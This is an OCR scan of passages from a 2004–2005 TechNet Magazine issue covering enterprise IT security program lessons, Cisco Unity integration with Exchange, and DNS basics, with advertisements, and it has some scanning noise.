cation and passes the credentials to the re- 
mote computer. 

Ifyou are using a third-party CSP, it must 
be loaded at both the remote client and the 
remote desktop server so that the smart card 
is recognized at each end of the Terminal 
Services connection. 


Conclusion 

A successful smart card deployment is 
dependent on proper planning and design. 
By putting the effort up front during the 
design process, making sure that you re- 
view all aspects discussed in this article, you 
will ensure a successful smart card deploy- 
ment for your organization. ® 


| 


Advertiser 


| AutoProf_ . 


CSI Bevturance ae 


| GFI tiene OC 


inane Seal 


Macrovision Corporation. a 


Microsoft Windows Server System 


Microsoft __ 


Microsoft rem Connections 


| Microsoft TechNet __ : 
| MSDN Magazine ¢ CD- ROM. 

| NeverFail Group 

ORCS Web 
PatchLink ‘Conppration. es. 
| RSA Conference 2005 


Sybari Software Inc. 


/Sys Admin Magazine 
| TechNet Magazine 


Vintela a 
Windows Connections 


Winternals Software 


re 
- 
rv 
ic 


Michele Hurabiell 
Ed Day 

Jonathan Hampson 
Julie Thibault 


Regional Manager-West 
Regional Manager-Central/SE 
Regional Manager-East 
Account Manager, All Regions 


URL 


“http: /eewow. autoprof.< COM pe 


www. idl com/tn. — 


ittp://tree twee com ssn 
_www.intenseschool.« com _ oe 
www.installshield. coneiteshires Be 
microsoft.com/getthrfacts a 2 
__mnicrosets som’ seeuty tT he 

oe: semisarkmetd rs ee 
_.msdn.microsoft.com/msdnmag/cdrom 9 
Wwweneverfailgroup.COM nnn 
_www.oresweb.com 
WWW. patchlink. com conn 
_www.rsaconference.com 
_www.sybari.com —— 
www.sysadminmag. com/sub/. inns 
http://technetmagsubs.« comtthe -prem i i esiéi@ds 
_wwwevintelacom 
_www.WinConnections.com mn AID... 


415-947-6199 
785-838-7547 
603-924-8500 
603-924-8400 


mhurabiell@cmp.com 
eday@cmp.com 
jhampson@cmp.com 
jthibault@cmp.com 


Page 


Aaron Turner 


Five Lessons From 
The Microsoft 


Security Center Of 
Excellence 


Co) 
Oo 
e 
se 
IOs 
E 
12} 
O 


support on security topics. 


¢ Responding to automated 
self-progating worms 

¢ Improving system design and 
maintenance for better 


security 
© Measuring and enforcing 


_ AT A GLANCE ~ 


Aaron Turner is the Microsoft 


ity Center of 
Excellence Delivery Manager, and works with Microsoft 
Services to coordinate security consulting activities 
around the world. He has worked with customers of all 
sizes to develop effective IT security programs. 


74 TechNet Magazine 


The SCOE collaborates with customers, partners, industry, and other teams 
at Microsoft to increase awareness, foster innovation, and expand its reach of — 
_ dows-based systems and worked diligently 
Since the Slammer and Blaster worms hit in 2003, members of the SCOE — to document the level of availability that 
have worked with many Microsoft corporate customers, dealing with diffi- 
cult security problems. To put the problems in perspective, it’s important to 
understand how Microsoft and our cus- _ 
_ the continual drive for efficiency in enter- 


_ prise IT operations, Windows operating 


tomers arrived in the situation that we 
found ourselves in last year. 


A Little History 


Five years ago, there wasa strong push by 


our enterprise customers to achieve the 
highest levels of availability possible on 
Windows’-based systems. This effort, com- 
bined with the improvements in Windows 
2000, resulted in a major shift toward ac- 
tual availability targets. To support these 


The Microsoft Security Center of Excellence (SCOE) assists 
Microsoft enterprise customers in establishing secure network 
environments by providing accurate and implementable guid- 
ance and tactical expertise for real-world security challenges. 


' targets, IT departments created Service 


Level Agreements (SLAs) for their Win- 


users could expect from their servers and 


_ workstations that run Windows. As Win- 


dows 2000 technology matured, along with 


systems became mission-critical for many 
Microsoft customers. 

For Microsoft customers SLAs were also 
the catalyst that let them see IT as a cost 


- that could be outsourced. This resulted in 
_ many companies investigating alternative 
_ options to drive efficiency. The mission- 
_ critical nature of Windows operating 
' systems, combined with the increased ex- 


pectation for availability and the push to- 
ward outsourcing, created an odd situation 
where the secure design, deployment, and 
maintenance of Windows systems were of- 
ten an afterthought. Even then security was 
often viewed as an impediment, especially 
by those in the eBusiness space. 

In July 2001, the Code Red virus was un- 
leashed, followed by Slammer, Blaster, and 
the recent Sasser worms. The advent of au- 
tomated, self-propagating worms that could 
exploit vulnerabilities in unprotected and 
unpatched systems wreaked havoc on many 
business networks. What is most interest- 
ing about these worms is that in every large- 
scale worm scenario, the technology existed 
to prevent the worms from succeeding. The 
worms generally spread due to process fail- 
ures. In every case where customers were 
not impacted by these worms, their resil- 
iency can be attributed to a robust IT secu- 
rity program that focuses on process rather 
than on technology. 

Note that OS vulnerabilities have been 
exploited for a long time, but the wide ac- 
ceptance of Windows as an enterprise plat- 
form and the advent of the Internet caught 
Microsoft in the cross hairs. It also served 
as a wake-up call to anyone working with 
Windows operating systems. Companies 
realized they had sacrificed security for the 
sake of convenient networking. 

For customers at Microsoft, the reper- 
cussions of Code Red spurred many of the 
security-related improvements that were 
seen in Service Pack 3 for Windows 2000, 
Service Pack 1 for Windows XP, and the 
secure-by-default design of Windows 
Server 2003. The consequences of worm- 
related security incidents served as a rally- 
ing point for many security professionals. 
Unfortunately, for those working with Win- 
dows operating systems, it took events on 
the scale of these insidious viruses to call 
attention to the importance of secure sys- 
tem design, deployment, and maintenance. 

Those of us focused on security at Micro- 
soft know that the root cause of Blaster and 
other worms targeting Microsoft applica- 
tions is software vulnerabilities. At the same 
time, we have learned from our own inter- 
nal Microsoft IT organization, as well as 
from customers who have dedicated time 
and talent to exploring the risks posed by 


www.technetmagazine.com 


security incidents, that software-based vul- 
nerabilities can be mitigated through an ef- 
fective IT security program. Here are some 
of the lessons. 


fmainframe computing. A simple 
inventory is a great place to start to deter- 
mine exactly which systems exist and how 
they are connected to your network. There 


are several ways to perform an inventory. — 


They include the use of rudimentary net- 
work scanning tools, complex log revision 
techniques using information in Active 
Directory’, Dynamic Host Configuration 
Protocol (DHCP), DNS servers, and using 


more manageable. The first step was sepa- 
rating the managed and the unmanaged. 

Subgroups were defined based on a 
system's role, its location, or other attributes 
that couldn't be consolidated to eliminate 
the unwieldy problem of attempting to se- 
cure each individual system. 


Nn Asset Ownership 

asset owner is either the system 
or or the support group tasked 
ystememaintenance. In the SCOE’s 
experience, a successful IT asset ownership 
assignment rarely results in an IT staff 
member being assigned as the person re- 
sponsible for system maintenance. Cross- 
ing the boundary from IT staff to business 
group ownership and responsibility for IT 


At Microsoft, the repercussion of Code Red 
on our customers spurred many of the 
security-related improvements that were seen 
in Service Pack 3 for Windows 2000. 


dedicated systems management tools. 

It's important to note that in nearly every 
catastrophic incident that affected our busi- 
ness customers, the problem was not caused 
by a managed system but was introduced 
by a system outside of the IT group’s con- 
trol. Itis imperative to create a process where 
you can quickly and effectively verify which 
systems are under your control, and then 
identify any unmanaged systems. The iden- 
tification of these systems generally repre- 
sents the most difficult task for the IT staff 
to accomplish, but it is a necessary effort. 

Several Microsoft customers that suc- 
cessfully identified their unmanaged sys- 
tems relied on a tightly integrated virtual 
team composed of members from IT op- 
erations and the networking group. 

To begin, the IT operations staff re- 
quested that the networking team identify 
all IP addresses in use on the company’s 
networks. The IT team then began subtract- 
ing known IP addresses of managed sys- 
tems from the list. The resulting set of IPs 
were not accounted for and thus identified 
the systems that needed to be addressed 
first. After all systems were identified, they 
were classified into subgroups to make them 


systems marks the beginning of a success- 
ful ownership assignment program. Based 
on experience, most IT professionals can 
easily identify examples where a line-of- 
business (LOB) application served as a 
blocker to deploying a critical system up- 
date. Shifting the responsibility of securing 
the IT asset that relies on the system to the 
business group is an important step in en- 
suring the success of this process. 
Microsoft, like most large global organi- 
zations, found a situation where business 
owners would resist system updates. At one 


For IT professionals, the central prin- 
ciples of any effective program 
designed to manage the risk asso- 
ciated with software-based vulner- 
abilities are: 

“ Identify and classify assets 

7 Establish asset ownership 


3 Define baseline system 
requirements 


¢Measure compliance 


© Enforce compliance 


September 2004 


suossa7 Aa») 


15 


point, there were possibly thousands of our 
internal systems that could not be properly 
secured or maintained because of the re- 
luctance to stop services long enough to 
change security settings or perform system 
updates. Over time, these exceptions were 
reduced to hundreds, and eventually re- 
duced to tens. Currently a business-group 
exception for a system must be escalated to 
the highest levels of a business unit in order 
to be approved. 

Creating a Responsible, Accountable, 
Consulted, Informed (RACI) matrix for as- 
sets is another great exercise in assuring that 
assets are properly accounted for and key 
stakeholders identified. Integrating this in- 
formation into a Configuration Manage- 
ment Database (CMDB) results in a very 
powerful data set that can help IT staff and 
business leaders make informed decisions 
about when to force the issue of updating a 
particular system or establishing improved 
system maintenance processes for line of 
business applications. 


cies, but relatively few confirm that those 
policies are applied uniformly on produc- 
tion systems. The alignment between secu- 
rity policies, system build standards, and 
actual implementation is extremely impor- 
tant. The key requirements that need to be 
identified can be information such as re- 
quired settings, required software and ser- 
vices, and required updates. There must also 
be key prohibitions that outline what is not 
an acceptable configuration. 

As with asset ownership, accountability 
and responsibility for the baseline system 
requirements should lie with the business 
group that relies on the IT system. If excep- 
tions are sought, each business group 
should follow a process to ensure that the 
appropriate risk is analyzed and commu- 
nicated to all participants and business 
leaders before they are granted. 

However, this should not be interpreted 


76 TechNet Magazine 


to mean that the only solution is the default 
model for system builds. Within Microsoft, 
we have standardized builds that employ- 
ees may use for their workstations, but any- 
one can install other platforms or versions 
of software. The onus is then placed on the 
user to assure that the system meets estab- 
lished baseline requirements for configu- 
ration settings, required software (such as 
antivirus protection), and that required up- 
dates are installed. Flexibility is possible, but 
should only be allowed within a carefully 
monitored and maintained environment. 


of managed-system configuration status, 
the identification of unmanaged systems, 
and the mapping of each system to an ap- 
propriate business owner who is ultimately 
responsible for the system’s adherence to 
the established system baseline. As with any 
complex process, measuring compliance 
requires periodic audits with formal targets 
to monitor the effectiveness of the program. 
The reports should officially serve as an in- 
dication of a company’s IT health in addi- 


tion to a warning light, helping those | 


responsible for IT systems make informed 
decisions about systems at greatest risk, and 
which baseline settings are inconsistent 
with the baseline system configuration. 


business-critical system would have been 
considered heretical. When businesses fo- 


cused more on availability than robustness, 
shutting down an LOB server to electively 
bolster security, would result in a lot of flak. 


Heaven forbid ifa CEO’s laptop temporarily 


lost connectivity due to maintenance, and 
he could not read e-mail. 

The SCOE handled just such a case re- 
cently with a customer. Ina follow-up meet- 
ing with the customer's IT staff, there were 


tense moments when the customer’s CEO 
expressed his frustration about being un- 
able to connect to the intranet while tech- 
nicians worked on resolving the problem. 
However, after reading the news headlines 
the next day about the impact of the same 
virus on several of his company’s competi- 


in nearly every 
catastrophic 
incident, the problem 
was not caused by a 
managed system but 
was introduced by a 
system outside of the 
IT group’s control. 


tors, he appreciated that his business had 
been protected by the procedures that he 
had cursed the day before. 

The benefits of enforcing security poli- 
cies and assuring adherence to baseline 
standards may not always be apparent, but 
with relatively few exceptions, new security 
processes have improved IT departments 
and changed how they are perceived and 
used within large organizations. 


Securing Your Environment 

A myriad of technologies exist to help 
you protect your environments, but with- 
out a robust procedure to ensure the integ- 
rity of systems connected to your networks, 
none will be effective. 

Working toward the establishment of a 
well-managed IT environment takes disci- 
pline and consistency. The Security Center 
of Excellence is committed to sharing with 
all of our customers the lessons that we learn 
from our own experiences, as well as the 
best practices that we prove within our in- 
ternal IT environments. For more informa- 
tion on security for Microsoft systems, talk 
with your Microsoft relationship manager 
or visit the Microsoft security Web pages at 
www.microsoft.com/security. @ 


THE WORLD’S_ LEADING INFORMATION SECURITY CONFERENCE AND EXPO 


F. fe} U R Te E E N T. H A N N U A L 

SSS Es February 14-18 ¢ Moscone Center e San Francisco 

In Prohibition-era America, : 

vast bootlegger syndicates 

smuggled in spirits from 

the Pacific and Atlantic. 

Their offshore fleets used 

sophisticated codes and 

ciphers to encrypt radio 

transmissions. To combat 

the problem, the Coast 

Guard called in Elizebeth 

Smith Friedman and her team 

of federal cryptanalysts to 

decipher messages seized 

in a 1931 New Orleans raid. 

In the end, the plaintext 

decryptions led a grand jury 

to indict 35 rumrunners; six 

bosses and smugglers were 

convicted and sentenced to 

prison on federal conspiracy 

charges. The culture of 

mobsters and speakeasies 

was dealt a serious blow. 


Code making and breaking 
continue to play a crucial role 
in international intelligence 
gathering, law enforcement 
and global trade. Join us 

at RSA” Conference 2005 

and learn new ways to 
protect your enterprise from 
today's information security 
hoodlums, or secure your 
application from a new breed 
of hacker-bootleggers! 


Platinum Cisco Systems 


Sponsors: 


SECURITY 


3 symantec. 


TippingPoint VeriSign 


Platinum 
Media 
Sponsor: 


Join the best and the brightest in the security industry at the 
largest gathering of information security professionals in the world. 


DON'T MISS_OUT! 


RSA® Conference 2005 has something for RSA Conference 2005 offers class sessions 


everyone. From high-level strategic outlooks to in the following tracks: 
development workshops, from implementation é Register by 
techniques to post-attack forensics, from « Applied Security + Implementers 
competitive industry analyses to mathematics and « Business of Security ¢ Perimeter Defense 
number theory ... if your job touches security, you : : off the 
need to be at this Conference. Cryptographers Privacy, Law & Policy d r , | 
* Developers * Professional Development standard registration rate! 
¢ 10,000+ attendees expected. * Government * Secure Web Services ic de MGC] 
Z nter source code 
© Over 250 exhibitors. « Hackers & Threats * Security Solutions 
250 dic ad * Identity & Access» Standards sree eee een 
S : 
news media and analyst Management * Wireless & Embedded 


organizations expected to participate. 


e A class schedule of 200 workshops and 
seminars of unparalleled breadth & depth. 


For more information, visit www.rsaconference.com 
To sponsor or exhibit, please call +1 (617) 848-8756 


RSA, the RSA Conference logo and the RSA Security logo are registered trademarks of RSA Security Inc. All other marks are trademarks of their respective companies. © 2004 RSA Security Inc. All rights reserved. 


Integration 


Jeff Centimano 


Voice Mail In 


Cisco Unity 


¢ Setting up Cisco Unity voice 
mail features 

e Integrating Unity with 
Microsoft Exchange 

e Planning an integrated voice 


AT A GLANCE 


mail deployment 


Jeff Centimano isa Principal Consultant for Levi, Ray & 
Shoup, Inc. LRS is a Microsoft Gold Partner and a Cisco 
Silver Partner. Jeff has been an IT consultant for 10 
years and specializes in Microsoft directory and 
messaging technologies. 


78 TechNet Magazine 


result voice mail and fax messages in a uset’s 
e-mail Inbox. An organization need not 
deploy a full IP telephony infrastructure to 
take advantage of unified messaging. 


Introducing Unified 
Messaging and Cisco Unity 
Simply put, unified messaging is the stor- 
age of multiple forms of communication 
in one central location. From this central 
location, messages can be retrieved and ma- 
nipulated in nontraditional ways. For ex- 


Your Inbox: 
Cisco Unity And 
Microsoft Exchange 

_ Make it Happen 


We've been hearing about voice/data convergence for several 
years now. Many organizations have taken the leap to reduce 
long-distance phone charges between offices, most often in 
the form of voice over Frame Relay (or similar transport). 


However, up-front costs, long private branch exchange (PBX) leases, and | 
general resistance from those more comfortable with traditional voice ser- 
vices have slowed desktop IP telephony deployments. As compelling asa fully 
converged network may be, most businesses are not yet ready to commit. 

One converged technology that should not be overlooked is unified mes- 
saging. This can take several forms, but is most often thought of by its end 


ample, think about checking your e-mail 


_ and finding a voice message from an im- 
_ portant client. Imagine being on the road 
' and having your e-mail messages read to 
' you in order of urgency. Consider retriev- 
_ ing a fax message by redirecting it to a fax 
| machine at your hotel business center. All 
_ of these scenarios and more are possible 
_ witha unified messaging system. 


One of the premier unified messaging 


' products is Cisco Unity. Cisco acquired 
_ Unity from Active Voice in 2000 in order to 
_ add a voice mail solution to Cisco’s suite of 
_ IP communication products. Since that ac- 
| quisition, Unity has seen a series of up- 
_ grades and improvements. Currently at 
_ version 4.0, Cisco Unity excels in delivering 
' advanced voice messaging services and 


can interface with Microsoft’ Exchange ver- 
sions 5.5, 2000, and 2003, as well as with 
Lotus Domino. 

Even though Unity is tightly integrated 
with other Cisco IP telephony products, it 
does not have a dependency on IP tele- 
phony and can be deployed in traditional 
PBX environments. An administrator sim- 
ply needs to install one or more Intel Dia- 
logic voice cards in the Unity server to allow 


it to communicate with the existing PBX. 
Cisco's Web site, www.cisco.com, provides step- 
by-step guides for integrating Unity with 
various vendor systems. 

Unity comes in two flavors: Unity Voice 
Mail and Unity Unified Messaging. Since 
Unity Voice Mail is a standalone product 
that does not integrate with other e-mail 
systems, I will not cover it here. 


Cisco Unity and Microsoft 
Integration Points 

Cisco Unity requires several important 
Microsoft technologies in order to func- 
tion. At first glance, the implementation of 
Unity may appear daunting. For starters, 
the product extends Active Directory’ with 
custom schema extensions, binds itself to 
a Global Catalog server, and requires ro- 
bust name resolution services. These re- 
quirements alone should indicate the 
importance of thorough planning. 

Unity needs to extend three Active Di- 
rectory schema classes (User, Group, and 
Contact) and create a new class of its own— 
the Unity Location class. The Unity instal- 
lation CD contains an application called 
ADSchemaSetup that imports the neces- 
sary .Idf files into Active Directory. 

Cisco provides excellent documentation 
on the exact number of schema extensions 
as well as on the potential impact on your 
Active Directory database size. For example, 
Cisco records and stores each user's spoken 
name in Active Directory. Depending on 
the codec you choose for audio compres- 
sion, this could be 20KB per user. (See the 
“Codecs” sidebar for further information.) 


www.technetmagazine.com 


Cisco recommends that you plan for a 
10-15 percent increase in the size of your 
Active Directory database after implement- 
ing Unity. If you are one of those people 
who enjoy running ADSIEDIT every now 
and then, you will appreciate Cisco's nam- 
ing standard: all attributes start with “cisco”. 


Keep in mind that the Cisco schema exten- 


sions should only be run after Active Di- 


rectory has been updated for Exchange © 


2000 or 2003 (forestprep). For more infor- 


mation about making this process as seam- 
less as possible, see “15 Tips For A Smooth 


Migration to Exchange Server 2003” in this | 


issue of TechNet Magazine. 

Unity also needs a well-configured Ac- 
tive Directory replication topology for reli- 
able operation. Unity uses Active Directory 
much like Exchange does, and that means 
that the Global Catalog server is of utmost 
importance. Unlike Exchange, which can 
tolerate the loss of a “favorite” Global Cata- 


log or directory server, Unity must be , 


manually reconfigured in such a situation. 


This is a relatively minor point if you know | 


about it ahead of time, but it could cost you 
hours of troubleshooting otherwise. 


Data Storage 


While we are on the subject of Active Di- 
rectory, it is important to note that while 


Unity requires Active Directory for numer- | 
ous operations, it does not query the Active | 


Directory database as often as you might 
think. Unity instead stores most of the in- 
formation about subscriber mailboxes and 
system configuration in its own SQL data- 


base. This is stored locally on the Unity | 


server, and only relevant portions are syn- 
chronized with Active Directory using a 
Cisco-supplied replication agent. 

Cisco decided upon this strategy for mul- 
tiple reasons, the most important being the 
fault-tolerant nature of maintaining a local 
database. Imagine a scenario where your 


Exchange or Active Directory servers are | 
down for maintenance. While you might | 
be able to warn internal users about an im- | 


Winter 2005 79 


Layout Help 
MirigiGxi«-H g 


Wed 6/90/2004 9:48 4M 


File Edit View Insert Format Tools Actions Forrn 


L&Reply (Reply to All (53 Forward y 


Reape Unity Messaging System - ee 


To: Centimano, Jeff 


Sot 
Subject: 


Figure 1 The ViewM 
pending outage, there is nothing to stop an 
outside caller from leaving a message for a 
company employee. In this situation, the 
Unity server has enough information about 
the employee's mailbox to accept the mes- 
sage and store it until the Exchange or Ac- 
tive Directory servers are back online. 

The flavor of SQL used by Unity is pri- 
marily dependent on the number of voice 


ports deployed. If your Unity server has 32 | 


or fewer voice ports, then Unity will con- 
figure a local MSDE 2000 database. Ifit has 
more than 32 ports or a failover configura- 


tion is required, Unity will install a local 
copy of SQL Server™ 2000. This installa- 


tion on the Unity server is only intended to 
support Unity; any other usage violates the 
terms of the Unity license agreement. 
Another integration point is Unity’s use 
of DNS and WINS. To communicate with 
your Exchange and Active Directory serv- 
ers, the Unity server must be pointed to the 
dynamic DNS servers that support your 
Active Directory environment. Unity can 
then query for service records (SRV) of rel- 
evant directory servers in the enterprise. 
WINS is required for environments still 
running Windows NT* domains, although 


it is also highly recommended for Active — 


Directory environments. 


Unity puts a real-time load on an Ex- | 


change infrastructure, so the performance 
of your Exchange infrastructure is some- 


thing else to consider even before adding — 


Unity to the mix. Unlike e-mail where de- 
lays are often acceptable, a big delay (such 


80 TechNet Magazine 


Message from an unidentified caller (5555550052) 


ail Playback Control 


as silence) when a user calls in to receive 
their voicemail can give a user the impres- 
sion that the messaging system is broken. 
Thus, you should run the Exchange perfor- 
mance tools to see how the system is re- 
sponding. If you see log stalls, poor disk 
performance, or high CPU usage, you may 
want to upgrade the servers, add memory, 
or look at alternative storage options. 

This evaluation process should be per- 
formed on each Exchange server, depend- 
ing on the mail policies in place, as the 


| performance from server to server may vary 
quite a bit. Mail policies, or the lack thereof, | 


can have a big effect on the performance of 
Exchange servers. Given the way that Unity 
indexes messages in a user’s Inbox, a large 
Inbox can be problematic. Without mail 
policies in place, Exchange performance 
may not be deterministic. 

You should also keep in mind that Cisco 
typically sells to the voice and telecom IT 
pros. As Exchange is usually managed by 
the server and application IT pros, you can 
run into a train wreck if these departments 


~ don't talk. Make sure they do. 


' Outlook and Voice Mail 


Integration 

The final integration point I will discuss 
in this article is the client-side component 
known as Unity ViewMail for Outlook’ 
(VMO).ViewMailis used to present a voice 
mail playback applet inside e-mails that 
contain a voice message. The ViewMail 
playback control panel is shown in Figure 1. 


Using the playback controls, a user can 
play, pause, increase or decrease volume, 


' and adjust the speed of a message. The abil- 


ity to speed up or slow down a voice mes- 
sage with the click of a mouse is a powerful 
feature and one that I use frequently, espe- 
cially for long messages or a message that I 


' need to hear more slowly. Even at the maxi- 


mum compression settings, the voice qual- 
ity remains amazingly good. 

While Outlook can play voice messages 
without using ViewMail, the experience is 


' much less robust. A user who checks her e- 
/ mail from a version of Outlook without 
' ViewMail must click on the attached WAV 


file and listen to it played back in the system 
default media player. This method works 
just fine, but does not offer the rich func- 
tionality of ViewMail. Also, when you use 
the ViewMail controls to play a voice mes- 
sage, the data is streamed over the network 
instead of the “download and play” experi- 
ence of a WAV file. 

ViewMail comes packaged as a Microsoft 
Installer file that lends itself to deploy- 
ment via Active Directory Group Policy or 
Systems Management Server (SMS). Alter- 
natively, this small application can be pack- 
aged and deployed simultaneously with a 
new install of Office 2003 using the Office 
2003 Resource Kit. Regardless of how you 
deploy ViewMail, it will surely become a 
welcome addition to Outlook. 


Unity Deployment: Real 
World Experience 

My company deployed Cisco Unity ear- 
lier this year as part of a full desktop IP 
telephony upgrade. Having been involved 
in the deployment, and now living with the 
technology on a daily basis, I feel qualified 
to offer some useful suggestions for your 
Unity implementation. 

The planning phase is arguably the most 
important in any project, Unity included. 
As in carpentry, a good rule of thumb is to 
measure twice, cut once. 

Depending on the size of your organiza- 
tion, Unity may bring together teams that 
otherwise might not work together: the 
Telco team, the Active Directory team, and 
the Exchange team. Cisco publishes an ex- 
cellent “Unity Design Guide” that covers 
topics such as how Unity works, PBX inte- 


gration, Windows domain considerations, 
and even how to construct an RS-232 Cable 


(needed to interface with many PBXs). I 
recommend making this document the | 


foundation of your implementation and 
ensuring that all team members have a thor- 
ough understanding of its contents. 
Another priority project component is 
training. The IT staff will need training on 
how to administer the new system, although 


it is surprisingly intuitive for first-time us- 


ers. wouldalso suggest a round of training 
with the user community. 

Unity offers an amazing array of features 
that may be overlooked if users are not 
trained on how to use the new system. It is 
particularly important to train users on the 
Cisco Personal Communications Assistant 
Web console, whose main screen is shown 
in Figure 2. 

From this console, users can access a wide 


array of features that would otherwise re- 
quire navigating a complex set of phone | 


menus. Educating users on this interface 
will enable them to take advantage of ad- 


also reducing unnecessary help desk calls. 

One of my favorite Unity features is text- 
to-speech (TTS). This feature allows me to 
call my office remotely and listen to my e- 
mail messages, which saves both time and 
money trying to find wireless hotspots to 
synchronize e-mail. 

One unintended consequence of TTS is 


the comic relief it provides when it reads 
some of those obnoxious spam messages 
(you know the ones I am referring to). 
While this may be funny to most people, it 
may offend a few, which is one more reason 
to step up your anti-spam efforts. If you 


have not done so already, I would recom- | 


Text-to-speech lets 
me call my office 
remotely and listen 
to my e-mail 
messages, which 
saves time and 
money trying to find 
wireless hotspots to 
synchronize e-mail. 


mend investigating the Microsoft Intelli- 


; gent Message Filter for Exchange Server 
vanced unified messaging features while - 


2003. This product is available at no charge 
to organizations running Exchange Server 
2003, and does an excellent job of blocking 
nearly all unwanted spam messages with 
very few false-positives. 

Another Unity feature that complements 
TTS is the ability to reply with a voice mes- 
sage to an e-mail. | commonly reply over 
the phone to e-mail messages read to me by 


Unity Assistant 


| Greetings ~ 


Greetings 


6 8 8 


a (ag'SCo Personal Communications Assistant 


* Olscover ail that's possible on the Internet. 


Notifi cation Devices = Private Lists ~ 


Phone Menu 
Message Playback 


Transfer and 


Screening 


Figure 2 Cisco Unity Personal Communications Assistant 


www.technetmagazine.com 


the Unity TTS feature. This capability ex- 
tends to non-Unity users as well, with the 
recipient receiving the voice message as a 
WAV file attachment. 

One missing link in this feature is the 
ability to insert a brief statement into a re- 
ply message to alert the recipient that the 
actual message is contained in the attached 


_ WAV file. The current version of Unity sim- 


ply delivers the original message as is, with 
the only addition being a WAV file attach- 


_ ment. Users not expecting this type of re- 
: ply maybe confused and delete the message, 
| thinking it was left in error. I hope that Cisco 


will address this shortcoming in a future 


| release of Unity. Until that time, include this 
| tidbit in your user training to head off po- 


tential problems. 

Finally, a robust Unity backup and re- 
store design is of utmost importance given 
the value most businesses place on voice 


_ messages. Cisco includes a utility called 
' Cisco Unity Disaster Recovery Tool (known 


as DiRT) that is designed to aid in migra- 


| tions from one version of Unity to another. 


While this utility can be used for daily 
backup and restore activities, Cisco recom- 
mends that you invest in additional soft- 
ware for this purpose. To fully protect the 
Unity server, you will need to acquire soft- 
ware agents to back up both the Windows 
OS and the SQL Server 2000 database. 

If a full server failure occurs, be sure to 
hang on to the network interface card (NIC) 
from the failed server. This is because the 
Unity license is tied to the MAC address on 
the NIC in your original server. If the origi- 
nal NIC is embedded on the system board 
or cannot be moved for some other reason, 
allow time to contact Cisco and have them 
reissue a license key for the replacement 
server. This scenario should be included in 
the Unity recovery section in your Disaster 
Recovery documentation. 


Conclusion 

Being able to check e-mail, voice mail, 
and faxes from anywhere on any device is a 
powerful capability, one which I cannot 
imagine living without. If you would like to 
learn more about deploying Unity within 
your organization, Cisco maintains a wealth 
of marketing and technical information on 
their Web site at www.cisco.com/go/unity. @ 


Winter 2005 81 


In a word, Yes. 


Stay connected. 


TechNet understands the challenges you face every day. It’s the "go-to" 
source where you'll get ahead with advice from experts, newsgroups, 
technical chats, webcasts, and more. TechNet is an information and 
community resource designed specifically for IT professionals who 
strive to keep systems up and running. 


TechNet offers several free programs that will help you stay connected, 


including technical briefings, webcasts, the TechNet Flash bi-weekly 
newsletter, TechNet Radio, and TechNet Virtual Lab. 


Micresoft |ech!\/et 


© 2004 Microsoft Corporation. All rights reserved. Microsoft is a registered trademark of Microsoft Corporation in the United States and/or other countries. 
The names of actual companies and products mentioned herein may be the trademarks of their respective owners. 


Regis Donovan 


how 


Without DNS, the Internet would be an ugly place. DNS is 
one of the services responsible for directing network traffic 
based on name and numerical IP addresses. Specifically, 

it’s the service that allows users to type in names in- 

stead of numbers to locate a Web site or Internet 

resource. To provide this service, DNS creates a 
mapping between the numeric IP addresses 


and the human-readable domain names 
that Internet users are accustomed to us- 
ing and can remember more easily. 
As you know, hosts connected 
to the Internet are each assigned 
a unique 32-bit IP address, 
usually expressed in a 
dotted decimal nota- 
tion of four 8-bit 
numbers, such as 


Root 


VWWw 


Figure 1 DNS Hierarchy 


Domain Name Sy: em 


wor 


KS 


printed and is usually just assumed. A domain name that in- 
cludes the trailing period character is said to bea Fully Quali- 
fied Domain Name (FQDN). However, domain names 
where the period character is implicit are also com- 

monly referred to as FQDNs. 
The hierarchy begins with the base of ? and 
becomes more specific moving from right to 
left. Figure 2 explains itand compares it toa 


phone number. 

Just as you shouldn’t expect that the 
phone number (212) 555-1234 
will lead to the same place as 
(425) 555-1234, you should 
not expect that the URLs 
www.example.com 
and www.example. 
org will be the same. 


127.0.1.25. DNS is 
distributed and hierarchical; its informa- 
tion is spread among thousands of servers 
all over the world. Any one of these servers 
may be considered authoritative for some 
specified section of the DNS database, but 
it may need to get information about other 
parts of the database from other servers. 
What this means in practice is that your 
local name server doesn’t have all the infor- 
mation for, say, www.technetmagazine.com, 
but it can figure out who to ask about it and 
find out for you when you make a request. 


How DNS Is Organized 

At the top of the DNS hierarchy are 13 
root name servers, which contain name 
server information for all of the generic top- 


level domains such as .com and .org as well 
as country-specific DNS addresses such as 
uk or .nz. The name servers for each of 
these top-level domains contains name 
server information for domains within that 
top-level domain. So the name server for 
.com will contain information about 
microsoft.com but will not contain infor- 
mation about microsoft.co.uk. Your name 
server will have to contact the server that 
contains the information for .co.uk. 

The hierarchy goes from the least spe- 
cific top-level domain to the most specific 
hostname (see Figure 1). 

All DNS records actually end with the 
period character (.) which represents the 
root of the DNS hierarchy, but it’s rarely 


You shouldn't even 
expect that fire.ice.example.com and 
fire.light.example.com will be the same 
machine—just as you wouldn't expect the 
telephone numbers (710) 555-1234 and 
(800) 707-1234 to ring on the same phone. 
There are billions of pieces of information 
spread out in tens of millions of domains, 
all stored in thousands, if not millions of 
DNS servers worldwide, and all of this in- 
formation is stored in zone files. 


Data Stored in Zone Files 

A DNS server that is authoritative for a 
given domain has a zone file that either con- 
tains all the information for that domain, 
or contains some information for that zone 
along with pointers for where to find infor- 


Regis Donovan has worked in the IT field for over 10 years; including 5 years at Microsoft. For most of her time in IT, she has supported enterprise-wide DNS infrastructures. She is currently 


employed by Upromise.com. 


www.technetmagazine.com 


Winter 2005 83 


Figure 2 A Phone Number in the Hierarchy | 


' stored in systemroot\system32\dns\ 
| cache.dns, contains pointers to the root 
_ DNS servers where your server will begin 
| all queries in the absence of other, more 


Hierarchy Description 


www.microsoft.com. 


A The base of the hierarchy 
com The com. top-level domain 


microsoft The domain microsoft within .com 
WWW The host www within the domain microsoft.com. 


1 The country code for the United States 
212 The area code within the United States 
555 The exchange within the area code 212 

1212 The specific telephone line in (212) 555 


mation for subdomains within that domain. 
The name server that is authoritative for, 
let’s say, example.com might have all of the 
information for all of the hosts whose 


names just end in example.com and point- | 


ers to the name servers that are authori- 


tative for officel.example.com and > 


Setting Up a Windows 


office2.example.com. This kind of delega- 
tion allows for the decentralization of DNS 


data so that local changes can be easily made 


at the local level. 
Information stored on a server not con- 


sidered by servers higher up in the hierar- 

chy to be authoritative for the zone in | 
question will likely never be seen by other | 
hosts on the Internet. If the .com servers | 


don't list my server as a name server for the 
example.com domain, then no hosts on the 


the cached information; the DNS server will 
the information has changed until it de- 


(TTL) expires or the entire cache is cleared. 


